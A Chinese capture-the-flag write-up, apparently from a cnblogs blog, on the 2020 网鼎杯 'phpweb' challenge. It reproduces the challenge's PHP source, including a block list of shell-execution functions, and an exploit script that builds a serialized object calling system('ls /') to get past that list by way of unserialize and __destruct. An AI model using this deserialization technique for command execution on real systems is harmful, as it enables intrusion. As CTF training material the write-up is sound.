• [网鼎杯 2020 朱雀组]phpweb


    知识点

    反序列化

    审题


    查看源码 发现了好东西 诶一个隐藏的按钮 本来想着改一下HTML 但是发现这一直刷新 于是抓了个包 抱着试一试的心态 随便改了个func后面跟的东西 发现了call_user_func()

    这可是好东西 说明date变量后面跟的就得是函数 p是这个函数的参数 喜出望外cat /flag 头都被打烂 题目没有那么简单 于是我们先highlight_file一手index.php 拿到源码

     <?php
        $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
        function gettime($func, $p) {
            $result = call_user_func($func, $p);
            $a= gettype($result);
            if ($a == "string") {
                return $result;
            } else {return "";}
        }
        class Test {
            var $p = "Y-m-d h:i:s a";
            var $func = "date";
            function __destruct() {
                if ($this->func != "") {
                    echo gettime($this->func, $this->p);
                }
            }
        }
        $func = $_REQUEST["func"];
        $p = $_REQUEST["p"];
    
        if ($func != null) {
            $func = strtolower($func);
            if (!in_array($func,$disable_fun)) {
                echo gettime($func, $p);
            }else {
                die("Hacker...");
            }
        }
        ?>
    

    看到了一大串过滤我就知道直接getshell是不可能了 但是我们可以通过反序列化来绕过过滤 因为没有过滤unserialize这个函数 并且在反序列化之后 __destruct之后会调用到gettime

    EXP

    <?php
        $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
        function gettime($func, $p) {
            $result = call_user_func($func, $p);
            $a= gettype($result);
            if ($a == "string") {
                return $result;
            } else {return "";}
        }
        class Test {
            var $p = "Y-m-d h:i:s a";
            var $func = "date";
            function __destruct() {
                if ($this->func != "") {
                    echo gettime($this->func, $this->p);
                }
            }
        }
        $a = new Test();
        $a -> p = 'ls /';
        $a -> func = 'system';
        echo (serialize($a)); 
    

    然后burp一下

    接下来慢慢找慢慢改就行了 就好办了

    EOF

  • 相关阅读:
    进程的概念与结构
    http://goeasy.io/cn/
    java实现扫二维码登录功能
    java发送短信验证码的功能实现
    java实现注册邮箱激活验证
    开启POP3/SMTP服务
    java生成6位随机数字
    javamail实现注册激活邮件
    MySQL SQL语句 生成32位 UUID
    Data source rejected establishment of connection, message from server: "Too many connections"
  • 原文地址:https://www.cnblogs.com/zhwyyswdg/p/14305156.html
Copyright © 2020-2023  润新知